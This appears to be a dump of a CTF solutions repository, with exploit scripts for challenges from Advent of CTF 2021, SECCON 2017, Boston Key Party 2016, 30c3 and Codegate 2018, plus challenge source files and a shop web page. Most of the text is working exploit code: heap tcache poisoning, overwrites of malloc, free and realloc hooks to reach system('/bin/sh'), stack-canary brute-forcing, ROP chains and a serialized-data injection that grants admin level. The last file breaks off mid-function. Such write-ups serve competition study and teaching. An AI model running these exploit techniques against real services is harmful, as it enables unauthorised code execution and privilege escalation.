-------------------------------------------------------------------------------- /advent-2021/santazon/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | file = "./santazon" 7 | bin = ELF(file) 8 | libc = ELF("./libc.so.6") 9 | 10 | #conn = process(file) 11 | conn = remote("santazon.advent2021.overthewire.org", 1210) 12 | 13 | def menu(choice): 14 | conn.recvuntil("mnput") 15 | conn.sendline(choice) 16 | 17 | def gift(s): 18 | menu("gift") 19 | conn.recvuntil("gift") 20 | conn.send(s) 21 | 22 | def wrap(idx, s): 23 | menu("wrap") 24 | conn.recvuntil("mndex") 25 | conn.sendline(str(idx)) 26 | conn.recvuntil("gift") 27 | conn.send(s) 28 | 29 | def return_gift(idx): 30 | menu("return") 31 | conn.recvuntil("mndex") 32 | conn.sendline(str(idx)) 33 | 34 | def open(idx): 35 | menu("open") 36 | conn.recvuntil("mndex") 37 | conn.sendline(str(idx)) 38 | 39 | def leak_from_stack(count): 40 | payload = "a"*count 41 | wrap(0, payload) 42 | open(0) 43 | conn.recvuntil(payload) 44 | return u64(conn.recvline()[:-1].ljust(0x8, "\x00")) 45 | 46 | """ 47 | 0x7ffcd8649628: 0x0000560061616161 0x0000000000000d68 48 | [libc] 49 | 0x7ffcd8649638: 0x00007ff79df59ad1 0x00007ff79e0b26a0 50 | 0x7ffcd8649648: 0x00007ff79e0b26a0 0x00007ff79e0b34a0 51 | [bin] [stack] 52 | 0x7ffcd8649658: 0x0000564a08cff1c0 0x00007ffcd8649800 53 | 0x7ffcd8649668: 0x0000000000000000 0x0000000000000000 54 | 0x7ffcd8649678: 0x00007ff79df575f8 0x0000564a08d00008 55 | 0x7ffcd8649688: 0x00007ff79e0b26a0 0x00007ff79e0b34a0 56 | 0x7ffcd8649698: 0x0000564a08cff2f8 0x0000000000000010 57 | """ 58 | 59 | libc_leak = leak_from_stack(0x8*2) 60 | libc_base = libc_leak - 0x7f17b8456ad1 + 0x7f17b83c3000 61 | libc.address = libc_base 62 | 63 | # Put chunks in tcache 64 | gift("b"*0x57) 65 | wrap(1, "\n") # Frees the chunk 66 | return_gift(0) 67 | return_gift(1) 68 | wrap(0, 
"c"*0x30) 69 | wrap(1, "c"*0x30) 70 | wrap(1, "\n") 71 | wrap(0, "\n") 72 | 73 | """ 74 | Allocated chunk | PREV_INUSE 75 | Addr: 0x555db4489000 76 | Size: 0x291 77 | 78 | Allocated chunk | PREV_INUSE 79 | Addr: 0x555db4489290 80 | Size: 0x411 81 | 82 | Allocated chunk | PREV_INUSE 83 | Addr: 0x555db44896a0 84 | Size: 0x21 85 | 86 | Allocated chunk | PREV_INUSE 87 | Addr: 0x555db44896c0 88 | Size: 0x1011 89 | 90 | Free chunk (tcache) | PREV_INUSE <-- Overflow this chunk 91 | Addr: 0x555db448a6d0 92 | Size: 0x61 93 | fd: 0x00 94 | 95 | Free chunk (tcache) | PREV_INUSE 96 | Addr: 0x555db448a730 97 | Size: 0x41 98 | fd: 0x555db448a780 <-- Overwrite this fd pointer 99 | 100 | Free chunk (tcache) | PREV_INUSE 101 | Addr: 0x555db448a770 102 | Size: 0x41 103 | fd: 0x00 104 | 105 | Top chunk | PREV_INUSE 106 | Addr: 0x555db448a7b0 107 | Size: 0x1f851 108 | """ 109 | 110 | # Clear pointers, so we do fresh allocations 111 | return_gift(0) 112 | return_gift(1) 113 | payload = "e"*0x60 + p64(libc.symbols['__realloc_hook']) 114 | wrap(0, payload.ljust(120, "\x00")) # Fill stack with our payload 115 | wrap(1, "f"*0x58) 116 | 117 | # Try to get an allocation on realloc 118 | return_gift(0) 119 | return_gift(1) 120 | wrap(0, "/bin/sh".ljust(0x37, "\x00")) 121 | 122 | log.info("System: " + hex(libc.symbols['system'])) 123 | wrap(1, p64(libc.symbols['system']).ljust(0x36, "\x00")) # Overwrite realloc hook 124 | wrap(0, "h"*0x34) # Trigger shell! 
125 | 126 | log.info("Libc leak: " + hex(libc_leak)) 127 | 128 | # AOTW{m0_pr3s3ntz_m0_pr0bl3mz} 129 | 130 | conn.interactive() 131 | -------------------------------------------------------------------------------- /seccon-2017/election-200/exploit.py: -------------------------------------------------------------------------------- 1 | # Need a couple of tries to get shell, some issue in a_write 2 | 3 | from pwn import * 4 | 5 | #context.log_level = 'debug' 6 | context.terminal = ['tmux', 'splitw', '-h'] 7 | 8 | file = "./election" 9 | bin = ELF(file) 10 | libc = ELF("libc-2.23.so") 11 | 12 | env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc-2.23.so")} 13 | 14 | #conn = remote("election.pwn.seccon.jp", 28349) 15 | conn = process(file, env=env) 16 | 17 | def stand(name): 18 | conn.recvuntil("chocolate\n>>") 19 | conn.sendline("1") 20 | conn.recvuntil("Enter the name") 21 | conn.sendline(name) 22 | 23 | def vote(show, name, name2 = None, leak=False): 24 | conn.recvuntil("chocolate\n>>") 25 | conn.sendline("2") 26 | conn.recvuntil("Show candidates") 27 | conn.sendline(show) 28 | if show == "y": 29 | conn.recvuntil("Candidates") 30 | if not leak: 31 | conn.recvuntil("name of the") 32 | conn.sendline(name) 33 | if name2 is not None: 34 | if not leak: 35 | conn.recvuntil("I'm not 'Oshima'") 36 | conn.sendline(name2) 37 | 38 | def result(): 39 | conn.recvuntil("chocolate\n>>") 40 | conn.sendline("3") 41 | 42 | def a_add(addr, value, step=False): 43 | if step and value > 0x70: 44 | a_add(addr, 0x70, step) 45 | value -= 0x70 46 | payload = "yes".ljust(0x20, "\x00") 47 | payload += p64(addr - 0x10) 48 | payload += p8(value) 49 | vote("n", "oshima", payload) 50 | 51 | def a_write(addr, value, orig = "", step=False): 52 | """Assuming existing value was 0""" 53 | while value != "" or orig != "": 54 | v = ord(value[0]) 55 | if orig is not "": 56 | v = v - ord(orig[0]) 57 | if v < 0: 58 | v += 0x100 59 | a_add(addr, v, step) 60 | orig = orig[1:] 61 | else: 62 | a_add(addr, 
v, step) 63 | addr += 1 64 | value = value[1:] 65 | 66 | fake_chunk1 = 0x602040 67 | 68 | ojima_str = fake_chunk1 + 0x100 69 | 70 | # Creating a fake structure inside string 71 | fake_struct = "a"*8 # fd 72 | fake_struct += "a"*8 # bk 73 | fake_struct += p64(ojima_str) # prev_size of a structure heap chunk 74 | stand(fake_struct) 75 | stand("random_string") # This is the next heap chunk containing structure 76 | stand("ojima") # This is needed for leaking heap address 77 | 78 | a_write(ojima_str, "ojima", step=True) # To continue arbitrary write 79 | 80 | a_add(bin.symbols['list'], 0xb0) # To out fake structure 81 | 82 | for i in range(0x20): 83 | vote("n", "ojima") # Increment name pointer to heap pointer 84 | 85 | a_add(bin.symbols['list'], 0x50) # List pointer now points back to our 86 | 87 | # Leaking heap address 88 | vote("y", "random_name", leak=True) 89 | conn.recvuntil("ojima\n* ") 90 | 91 | heap_addr = u64(conn.recvline().strip().ljust(0x8, "\x00")) 92 | log.info("Leaked heap address: " + hex(heap_addr)) 93 | 94 | chunk_addr = heap_addr - 0x60 # Address of the second chunk in the list 95 | current_name_ptr = heap_addr - 0x20 96 | 97 | a_write(chunk_addr, p64(bin.got['srand']), p64(current_name_ptr)) 98 | 99 | # Leaking libc address 100 | vote("y", "random_name", leak=True) 101 | conn.recvuntil("ojima\n* ") 102 | srand_addr = u64(conn.recvline().strip().ljust(0x8, "\x00")) 103 | log.info("Leaked libc address: " + hex(srand_addr)) 104 | 105 | libc_base = srand_addr - libc.symbols['srand'] 106 | malloc_hook_addr = libc_base + libc.symbols['__malloc_hook'] 107 | one_shot_gadget = libc_base + 0xf0274 108 | 109 | a_write(malloc_hook_addr, p64(one_shot_gadget), step=True) 110 | 111 | a_write(bin.symbols['lv'], "\x00", "\x02") 112 | 113 | stand("haha") 114 | 115 | conn.interactive() 116 | 117 | -------------------------------------------------------------------------------- /boston-key-party-2016/cookbook/exploit.py: 
-------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | file = "./cookbook" 7 | bin = ELF(file) 8 | libc = ELF("/lib/i386-linux-gnu/libc.so.6") 9 | #libc = ELF("./libc.so.6") 10 | 11 | env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc.so.6")} 12 | 13 | conn = process(file) 14 | #conn = gdb.debug(file) 15 | 16 | def menu(ch): 17 | conn.recvuntil("[q]uit") 18 | conn.sendline(ch) 19 | 20 | def list_i(): 21 | menu("l") 22 | 23 | def list_r(): 24 | menu("r") 25 | 26 | def add_i(): 27 | menu("a") 28 | 29 | def add_i_menu(ch): 30 | conn.recvuntil("(doesn't quit") 31 | conn.sendline(ch) 32 | 33 | def list_current_stats(): 34 | add_i_menu("l") 35 | 36 | def new_ingredient(): 37 | add_i_menu("n") 38 | 39 | def discard_ingredient(): 40 | add_i_menu("d") 41 | 42 | def give_name_to_ingredient(name): 43 | add_i_menu("g") 44 | conn.sendline(name) 45 | 46 | def price_ingredient(price): 47 | add_i_menu("p") 48 | conn.sendline(str(price)) 49 | 50 | def set_calories(cal): 51 | add_i_menu("s") 52 | conn.sendline(str(cal)) 53 | 54 | def quit_ingredient(): 55 | add_i_menu("q") 56 | 57 | def export_ingredient(): 58 | add_i_menu("e") 59 | conn.recvuntil("saved") 60 | 61 | def create_recipe(): 62 | menu("c") 63 | 64 | def create_recipe_menu(ch): 65 | conn.recvuntil("[q]uit") 66 | conn.sendline(ch) 67 | 68 | def new_recipe(): 69 | create_recipe_menu("n") 70 | 71 | def discard_recipe(): 72 | create_recipe_menu("d") 73 | 74 | def add_ingredient_recipe(name): 75 | create_recipe_menu("a") 76 | conn.recvuntil("which ingredient to add?") 77 | conn.sendline(name) 78 | 79 | def remove_ingredient_recipe(name): 80 | create_recipe_menu("r") 81 | conn.recvuntil("ingredient to remove?") 82 | conn.sendline(name) 83 | 84 | def give_name_recipe(name): 85 | create_recipe_menu("g") 86 | conn.sendline(name) 87 | 88 | def save_recipe(): 89 | create_recipe_menu("s") 90 
| 91 | def print_recipe(): 92 | create_recipe_menu("p") 93 | 94 | def quit_recipe(): 95 | create_recipe_menu("q") 96 | 97 | def exterminate_i(i): 98 | menu("e") 99 | conn.recvuntil("which ingredient") 100 | conn.sendline(i) 101 | 102 | def set_cook_name(size, name): 103 | menu("g") 104 | conn.recvuntil("long is ") 105 | conn.sendline(str(hex(size))) 106 | conn.send(name) 107 | 108 | def remove_cook_name(): 109 | menu("R") 110 | 111 | name = "vampire" 112 | 113 | conn.recvuntil("name?") 114 | conn.sendline(name) 115 | 116 | # Vulnerabilities: 117 | # 118 | # - main_menu - double free cookbook ptr 119 | # - create_recipe - double free + use after 120 | # - give_name_to_recipe - heap overflow 121 | 122 | # Leaking libc and heap address 123 | 124 | # Adding two chunks in unsorted bin of size 0x90 125 | 126 | set_cook_name(0x90, "a\n") 127 | add_i() 128 | new_ingredient() 129 | give_name_to_ingredient("name1") 130 | export_ingredient() 131 | quit_ingredient() 132 | remove_cook_name() 133 | exterminate_i("onion") 134 | 135 | add_i() 136 | new_ingredient() 137 | give_name_to_ingredient("name2") 138 | export_ingredient() 139 | quit_ingredient() 140 | 141 | list_i() 142 | conn.recvuntil("name2") 143 | conn.recvuntil("calories: ") 144 | libc_leak = int(conn.recvline()) 145 | if libc_leak < 0: 146 | libc_leak += 0x100000000 147 | libc.address = libc_leak - 0xf76d97b0 + 0xf7527000 148 | conn.recvuntil("price: ") 149 | heap_leak = int(conn.recvline()) 150 | if heap_leak < 0: 151 | heap_leak += 0x100000000 152 | 153 | create_recipe() 154 | new_recipe() 155 | give_name_recipe("\xff"*0x400) 156 | quit_recipe() 157 | 158 | malloc_size = libc.symbols['__free_hook'] - (heap_leak - 0x83a52a8 + 0x83a5818) 159 | set_cook_name(malloc_size, "a\n") 160 | quit_ingredient() 161 | set_cook_name(0x150, "a"*0x10 + p32(libc.symbols['system']) + "\n") 162 | 163 | set_cook_name(100, "/bin/sh\x00\n") 164 | remove_cook_name() 165 | 166 | log.info("Libc leak: " + hex(libc_leak)) 167 | log.info("Heap 
leak: " + hex(heap_leak)) 168 | 169 | conn.interactive() 170 | -------------------------------------------------------------------------------- /codegate-2018/rbSql/style.css: -------------------------------------------------------------------------------- 1 | input{ 2 | border:1px solid #CFDDDD; 3 | } 4 | 5 | body { 6 | margin: 0; 7 | padding : 0; 8 | background: #ccc url(images/bg.jpg) center repeat; 9 | color: #555; 10 | } 11 | /*WRAP*/ 12 | #container { 13 | width: 760px; 14 | margin-left: auto; 15 | margin-right: auto; 16 | padding: 0; 17 | font: 76% "Trebuchet MS","lucida sans", tahoma, sans-serif; 18 | line-height: 1.8em; 19 | background: transparent; 20 | color: #666; 21 | } 22 | /*TOP BANNER*/ 23 | #banner { 24 | padding: 0; 25 | margin-bottom: 0; 26 | height: 225px; 27 | border-bottom:3px solid #fff; 28 | background: #82B64D url(images/wine.jpg); 29 | color: #000; 30 | } 31 | /*TOP NAVIGATION*/ 32 | #navbar ul { 33 | float:left; 34 | width:100%; 35 | padding:0; 36 | margin:0; 37 | list-style-type:none; 38 | font-size: 130%; 39 | text-align: center; 40 | border-bottom:3px solid #fff; 41 | background: #385900; 42 | color: #000; 43 | } 44 | #navbar a { 45 | float:left; 46 | width:6em; 47 | height:30px; 48 | text-decoration:none; 49 | color:#fff; 50 | background:#385900; 51 | padding:0.5em 0.6em; 52 | border-right:1px solid #fff; 53 | } 54 | #navbar a:hover { 55 | background:#8BBA00; 56 | color: #000; 57 | } 58 | #navbar li { 59 | display:inline; 60 | } 61 | /*MAIN CONTENT*/ 62 | #content { 63 | padding: 1em; 64 | margin-left: 200px; 65 | } 66 | /*SIDEBAR*/ 67 | #sidebar { 68 | float: left; 69 | width: 160px; 70 | margin: 0; 71 | padding: 0 1em 0 1em; 72 | } 73 | /*SIDE MENU*/ 74 | #sidebar ul { 75 | list-style: none; 76 | margin: 0 0 20px 0; 77 | padding: 0; 78 | } 79 | #sidebar ul li { 80 | display: inline; 81 | padding: 0; 82 | margin: 0; 83 | } 84 | #sidebar ul li a { 85 | display: block; 86 | color: #385900; 87 | background: inherit; 88 | 
text-decoration: none; 89 | margin: 0; 90 | padding: 5px 0 5px 0; 91 | border-bottom: 1px solid #C0C0C0; 92 | } 93 | #sidebar ul li a:hover { 94 | text-decoration: none; 95 | background: #E6E7E9; 96 | color: #DA7910; 97 | } 98 | /*FOOTER*/ 99 | #footer { 100 | clear: both; 101 | width:750px; 102 | padding: 5px; 103 | margin: 0; 104 | font-size: 0.8em; 105 | border-top: 3px solid #fff; 106 | border-bottom: 3px solid #fff; 107 | background: #88C706; 108 | color: #000; 109 | } 110 | #footer a:link, #footer a:visited { 111 | text-decoration : none; 112 | background : inherit; 113 | color : #000; 114 | } 115 | #footer a:hover { 116 | text-decoration : underline; 117 | background : inherit; 118 | color : #fff; 119 | } 120 | /*LINKS*/ 121 | a:link, a:visited { 122 | text-decoration : none; 123 | background : inherit; 124 | color : #DA7910; 125 | } 126 | a:hover { 127 | text-decoration : underline; 128 | background : inherit; 129 | color : #385900; 130 | } 131 | /*TYPOGRAPHY*/ 132 | h1 { 133 | margin: 0; 134 | padding: 30px 0 0 20px; 135 | font-size: 175%; 136 | letter-spacing: 3px; 137 | } 138 | h2 { 139 | margin-top: 10px; 140 | padding: 10px 0 10px 0; 141 | font-size: 160%; 142 | letter-spacing: 3px; 143 | background : transparent; 144 | color : #385900; 145 | } 146 | h3 { 147 | margin: 0; 148 | padding: 10px 0 10px 0; 149 | font-size: 160%; 150 | letter-spacing: 3px; 151 | background : inherit; 152 | color : #385900; 153 | } 154 | blockquote { 155 | font-weight : bold; 156 | font-style : italic; 157 | color : #b29b35; 158 | } 159 | /*CLASS*/ 160 | .clear { 161 | clear: both; 162 | overflow: hidden; 163 | width: 0; 164 | height: 0; 165 | } 166 | .slogan { 167 | margin: 0 0 0 50px; 168 | letter-spacing: 3px; 169 | } 170 | 171 | .post{ 172 | background: #E6E7E9; 173 | padding: 3px; 174 | margin: 20px 10px 10px 5px; 175 | font-size: 80%; 176 | } 177 | .post .date { 178 | background: url(images/clock.gif) no-repeat left center; 179 | padding-left: 15px; 180 | margin: 0 15px 
0 5px; 181 | } 182 | .post .comments { 183 | background: url(images/comment.gif) no-repeat left center; 184 | padding-left: 15px; 185 | margin: 0 15px 0 5px; 186 | } 187 | .post .readmore { 188 | background: url(images/document.gif) no-repeat left center; 189 | padding-left: 15px; 190 | margin: 0 15px 0 5px; 191 | } -------------------------------------------------------------------------------- /codegate-2018/rbSql/exploit.php: -------------------------------------------------------------------------------- 1 | $pointer){ 66 | if($rawData[$pointer] == STR){ 67 | $pointer++; 68 | $length = ord($rawData[$pointer]); 69 | $pointer++; 70 | $parsed[$idx] = substr($rawData,$pointer,$length); 71 | $pointer += $length; 72 | } 73 | elseif($rawData[$pointer] == ARR){ 74 | $pointer++; 75 | $arrayCount = ord($rawData[$pointer]); 76 | $pointer++; 77 | for($i=0;$i<$arrayCount;$i++){ 78 | if(substr($rawData,$pointer,1) == ARR){ 79 | $pointer++; 80 | $arrayCount2 = ord($rawData[$pointer]); 81 | $pointer++; 82 | for($j=0;$j<$arrayCount2;$j++){ 83 | $pointer++; 84 | $length = ord($rawData[$pointer]); 85 | $pointer++; 86 | $parsed[$idx][$i][$j] = substr($rawData,$pointer,$length); 87 | $pointer += $length; 88 | } 89 | } 90 | else{ 91 | $pointer++; 92 | $length = ord(substr($rawData,$pointer,1)); 93 | $pointer++; 94 | $parsed[$idx][$i] = substr($rawData,$pointer,$length); 95 | $pointer += $length; 96 | } 97 | } 98 | } 99 | $idx++; 100 | if($idx > 2048) break; 101 | } 102 | return $parsed[0]; 103 | } 104 | 105 | function rbPack($data){ 106 | $rawData = ""; 107 | if(is_string($data)){ 108 | $rawData .= STR . chr(strlen($data)) . $data; 109 | } 110 | elseif(is_array($data)){ 111 | $rawData .= ARR . 
chr(count($data)); 112 | for($idx=0;$idx 16) var_dump("id too long"); 121 | if(!ctype_alnum($uid)) var_dump("id must be alnum!"); 122 | if(strlen($umail) > 256) var_dump("email too long"); 123 | $upw = md5($upw); 124 | $uip = "127.0.0.1"; 125 | $table = rbSql("create","member_".$uid,["id","mail","pw","ip","lvl"]); 126 | $table = rbSql("insert","member_".$uid,[$uid,$umail,$upw,$uip,"1"], $table); 127 | return $table; 128 | } 129 | } 130 | 131 | function login($uid, $upw, $contents) { 132 | return rbSql("select","member_".$uid,["pw",md5($upw)], $contents); 133 | } 134 | 135 | // Simulating the login flow 136 | $umail = STR . "\x20" . "1a1dc91c907325c69271ddf0c944bc72"; 137 | $umail .= STR . "\x01" . "b"; 138 | $umail .= STR . "\x01" . "2"; 139 | $umail .= str_repeat("z", 256 - strlen($umail)); 140 | $uid = "myid2"; 141 | $upw = "pass"; 142 | 143 | $table = register($uid, $upw, $umail); 144 | 145 | // Storing and retreiving again from file 146 | $contents = rbParse(rbPack($table)); 147 | 148 | $res = login($uid, $upw, $contents); 149 | 150 | // Use the following umail while registering 151 | // Rest process is same 152 | var_dump(urlencode($umail)); -------------------------------------------------------------------------------- /30c3-2013/bigdata/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.log_level = 'warning' 4 | 5 | bin = ELF("./server") 6 | libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 7 | 8 | # Brute forcing canary 9 | canary = "" 10 | for j in range(len(canary), 8): 11 | for i in range(256): 12 | try: 13 | conn = remote("localhost", 1234) 14 | payload = "a"*0x2008 + canary + chr(i) 15 | conn.recvuntil("insert your data") 16 | conn.send(payload) 17 | conn.recvuntil("We received") 18 | conn.recvuntil("data saved") 19 | canary += chr(i) 20 | log.warning("Canary: " + str(j) + " - " + canary.encode('hex')) 21 | break 22 | except: 23 | conn.close() 24 | pass 25 | 26 | # Brute force 
rbp 27 | rbp = "" 28 | for j in range(len(rbp), 8): 29 | for i in range(256): 30 | try: 31 | conn = remote("localhost", 1234) 32 | payload = "a"*0x2008 + canary + rbp + chr(i) 33 | conn.recvuntil("insert your data") 34 | conn.send(payload) 35 | conn.recvuntil("We received") 36 | conn.recvuntil("data saved") 37 | rbp += chr(i) 38 | log.warning("RBP: " + str(j) + " - " + rbp.encode('hex')) 39 | break 40 | except: 41 | conn.close() 42 | pass 43 | 44 | # Brute force binary address 45 | bin_addr = "\x15" 46 | for j in range(len(bin_addr), 8): 47 | for i in range(256): 48 | try: 49 | conn = remote("localhost", 1234) 50 | payload = "a"*0x2008 + canary + rbp + bin_addr + chr(i) 51 | conn.recvuntil("insert your data") 52 | conn.send(payload) 53 | conn.recvuntil("We received") 54 | conn.recvline(timeout=0.5) 55 | if "data saved" in conn.recvline(timeout=0.5): 56 | bin_addr += chr(i) 57 | log.warning("Bin address: " + str(j) + \ 58 | " - " + bin_addr.encode('hex')) 59 | break 60 | except: 61 | conn.close() 62 | pass 63 | 64 | # Leaking libc 65 | conn = remote("localhost", 1234) 66 | 67 | bin.address = u64(bin_addr) - 0xe15 68 | 69 | """ 70 | ec6: 48 8b 5c 24 08 mov rbx,QWORD PTR [rsp+0x8] 71 | ecb: 48 8b 6c 24 10 mov rbp,QWORD PTR [rsp+0x10] 72 | ed0: 4c 8b 64 24 18 mov r12,QWORD PTR [rsp+0x18] 73 | ed5: 4c 8b 6c 24 20 mov r13,QWORD PTR [rsp+0x20] 74 | eda: 4c 8b 74 24 28 mov r14,QWORD PTR [rsp+0x28] 75 | edf: 4c 8b 7c 24 30 mov r15,QWORD PTR [rsp+0x30] 76 | ee4: 48 83 c4 38 add rsp,0x38 77 | ee8: c3 ret 78 | """ 79 | payload = "a"*0x2008 + canary + rbp + \ 80 | p64(bin.address + 0xec6) + \ 81 | p64(0) + \ 82 | p64(0) + \ 83 | p64(0) + \ 84 | p64(bin.got['dprintf']) + \ 85 | p64(0) + \ 86 | p64(bin.got['read']) + \ 87 | p64(4) 88 | 89 | """ 90 | eb0: 4c 89 ea mov rdx,r13 91 | eb3: 4c 89 f6 mov rsi,r14 92 | eb6: 44 89 ff mov edi,r15d 93 | eb9: 41 ff 14 dc call QWORD PTR [r12+rbx*8] 94 | """ 95 | payload += p64(bin.address + 0xeb0) 96 | 97 | conn.recvuntil("insert your data") 
98 | conn.send(payload) 99 | conn.recvuntil("thanks.\n") 100 | 101 | libc_leak = u64(conn.recvn(6) + "\x00\x00") 102 | conn.close() 103 | 104 | log.warning("Libc leak: " + hex(libc_leak)) 105 | libc.address = libc_leak - libc.symbols['read'] 106 | 107 | conn = remote("localhost", 1234) 108 | 109 | bin_sh_addr = next(libc.search("/bin/sh")) 110 | 111 | """ 112 | 0x0000000000021102 : pop rdi ; ret 113 | """ 114 | pop_rdi_gadget = libc.address + 0x21102 115 | 116 | """ 117 | 0x00000000001150c9 : pop rdx ; pop rsi ; ret 118 | """ 119 | pop_rdx_rsi_gadget = libc.address + 0x1150c9 120 | 121 | payload = "a"*0x2008 + canary + rbp + \ 122 | p64(pop_rdi_gadget) + \ 123 | p64(4) + \ 124 | p64(pop_rdx_rsi_gadget) + \ 125 | p64(0x20) + \ 126 | p64(bin.address + 0x2020D0) + \ 127 | p64(libc.symbols['read']) + \ 128 | p64(pop_rdi_gadget) + \ 129 | p64(bin.address + 0x2020D0) + \ 130 | p64(libc.symbols['system']) 131 | 132 | conn.recvuntil("insert your data") 133 | conn.send(payload) 134 | conn.recvuntil("thanks.") 135 | 136 | conn.sendline("touch pwned\x00") 137 | 138 | conn.close() 139 | -------------------------------------------------------------------------------- /codegate-2018/rbSql/index.php: -------------------------------------------------------------------------------- 1 | 7 |

Login

8 |

9 |

10 | 11 | 12 | 13 | 14 | 15 |
ID
PW
16 |
17 |

18 | 22 |

Join

23 |

24 |

25 | 26 | 27 | 28 | 29 | 30 | 31 |
ID
MAIL
PW
32 |
33 |

34 | location.href='./';"); 46 | } 47 | else error("login fail"); 48 | } 49 | elseif($page == "join_chk"){ 50 | $uid = $_POST['uid']; 51 | $umail = $_POST['umail']; 52 | $upw = $_POST['upw']; 53 | if(($uid) && ($upw) && ($umail)){ 54 | if(strlen($uid) < 3) error("id too short"); 55 | if(strlen($uid) > 16) error("id too long"); 56 | if(!ctype_alnum($uid)) error("id must be alnum!"); 57 | if(strlen($umail) > 256) error("email too long"); 58 | include "dbconn.php"; 59 | $upw = md5($upw); 60 | $uip = $_SERVER['REMOTE_ADDR']; 61 | if(rbGetPath("member_".$uid)) error("id already existed"); 62 | $ret = rbSql("create","member_".$uid,["id","mail","pw","ip","lvl"]); 63 | if(is_string($ret)) error("error"); 64 | $ret = rbSql("insert","member_".$uid,[$uid,$umail,$upw,$uip,"1"]); 65 | if(is_string($ret)) error("error"); 66 | exit(""); 67 | } 68 | else error("join fail"); 69 | } 70 | elseif($page == "photo"){ 71 | ?> 72 |

Photo

73 |

74 |

75 |

76 |

77 | 81 |

Music Video

82 |

83 |

84 |

85 |

86 | uid : {$_SESSION['uid']}

level : "; 90 | if($_SESSION['lvl'] == 1) echo "Guest"; 91 | elseif($_SESSION['lvl'] == 2) echo "Admin"; 92 | echo "

"; 93 | include "dbconn.php"; 94 | $ret = rbSql("select","member_".$_SESSION['uid'],["id",$_SESSION['uid']]); 95 | echo "

mail : {$ret['1']}

ip : {$ret['3']}

"; 96 | if($_SESSION['lvl'] === "2"){ 97 | echo "

Flag :

"; 98 | include "/flag"; 99 | rbSql("delete","member_".$_SESSION['uid'],["id",$_SESSION['uid']]); 100 | } 101 | } 102 | elseif($page == "logout"){ 103 | session_destroy(); 104 | exit(""); 105 | } 106 | else{ 107 | ?> 108 |

ㅋrystal :/

109 |

110 | -------------------------------------------------------------------------------- /insomni-hack-18/sapeloshop/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | Jackie Stewart's Sapeurs Shop 10 | 11 | 12 | 13 | 14 | 15 | 16 | 30 | 31 | 32 | 33 | 34 |
35 | 41 |
42 | 43 |
44 | 45 |
46 |
47 |

The sapelogie prophet

48 | 49 |

Jackie Stewart

50 |

Real sapeurs know were to shop! You can buy everything here to look just like me!

51 |
52 |
53 | 54 |
55 |
56 | 57 |
58 |
59 | eyewear_dolce.jpg 60 |

The eyewear, Dolce & Gabbana.

61 |
62 |
63 | paul_smith_suit.jpg 64 |

The suit. Paul Smith. Super 160'. It's not anything.

65 |
66 |
67 | brown_boxer.jpg 68 |

The brown boxer short assorted to the suit.

69 |
70 |
71 | black_belt.jpg 72 |

The belt. Black as the shoes.

73 |
74 |
75 | armani_tie.jpg 76 |

The Armani Tie, very mystic.

77 |
78 |
79 | black_shoes.jpg 80 |

The black shoes.

81 |
82 |
83 | brown_socks.jpg 84 |

The brown socks. Assorted to the boxer.

85 |
86 |
87 | brown_watch.jpg 88 |

The brown watch, function with blood.

89 |
90 |
91 | 92 |
93 |
94 | 95 |
96 | 97 |
98 |
99 |

© Jackie Stewart. Gabao RPZ à point 0.

100 |
101 |
102 | 103 | 104 | -------------------------------------------------------------------------------- /codegate-2018/rbSql/dbconn.php: -------------------------------------------------------------------------------- 1 | $pointer){ 117 | if($rawData[$pointer] == STR){ 118 | $pointer++; 119 | $length = ord($rawData[$pointer]); 120 | $pointer++; 121 | $parsed[$idx] = substr($rawData,$pointer,$length); 122 | $pointer += $length; 123 | } 124 | elseif($rawData[$pointer] == ARR){ 125 | $pointer++; 126 | $arrayCount = ord($rawData[$pointer]); 127 | $pointer++; 128 | for($i=0;$i<$arrayCount;$i++){ 129 | if(substr($rawData,$pointer,1) == ARR){ 130 | $pointer++; 131 | $arrayCount2 = ord($rawData[$pointer]); 132 | $pointer++; 133 | for($j=0;$j<$arrayCount2;$j++){ 134 | $pointer++; 135 | $length = ord($rawData[$pointer]); 136 | $pointer++; 137 | $parsed[$idx][$i][$j] = substr($rawData,$pointer,$length); 138 | $pointer += $length; 139 | } 140 | } 141 | else{ 142 | $pointer++; 143 | $length = ord(substr($rawData,$pointer,1)); 144 | $pointer++; 145 | $parsed[$idx][$i] = substr($rawData,$pointer,$length); 146 | $pointer += $length; 147 | } 148 | } 149 | } 150 | $idx++; 151 | if($idx > 2048) break; 152 | } 153 | return $parsed[0]; 154 | } 155 | 156 | function rbPack($data){ 157 | $rawData = ""; 158 | if(is_string($data)){ 159 | $rawData .= STR . chr(strlen($data)) . $data; 160 | } 161 | elseif(is_array($data)){ 162 | $rawData .= ARR . 
chr(count($data)); 163 | for($idx=0;$idx>>") 18 | conn.sendline(str(choice)) 19 | if idx is not None: 20 | conn.recvuntil("Enter index") 21 | conn.sendline(str(idx)) 22 | 23 | def clip_menu(choice): 24 | conn.recvuntil(">>>") 25 | conn.sendline(str(choice)) 26 | 27 | def add_video(res, fps, no, data, desc): 28 | """ 8 4 4 no 0x2f 29 | malloc(0x50) 30 | """ 31 | menu(1) 32 | clip_menu(1) 33 | conn.recvuntil("Video Resolution") 34 | conn.send(res) 35 | conn.recvuntil("FPS :") 36 | conn.send(fps) 37 | conn.recvuntil("Number of Frames") 38 | conn.send(p32(no)) 39 | conn.recvuntil("Video Data") 40 | conn.send(data) 41 | conn.recvuntil("Add description") 42 | conn.send(desc) 43 | 44 | def add_audio(bitrate, length, data, desc): 45 | """ 2 4 length 0x2f 46 | malloc(0x48) 47 | """ 48 | menu(1) 49 | clip_menu(2) 50 | conn.recvuntil("Audio Bitrate") 51 | conn.send(bitrate) 52 | conn.recvuntil("Audio Length") 53 | conn.send(p32(length)) 54 | conn.recvuntil("Audio Data") 55 | conn.send(data) 56 | conn.recvuntil("Add description") 57 | conn.send(desc) 58 | 59 | def add_sub(length, subtitle, lang=None): 60 | """ 4 length 4 61 | malloc(0x18) 62 | """ 63 | menu(1) 64 | clip_menu(3) 65 | if lang is not None: 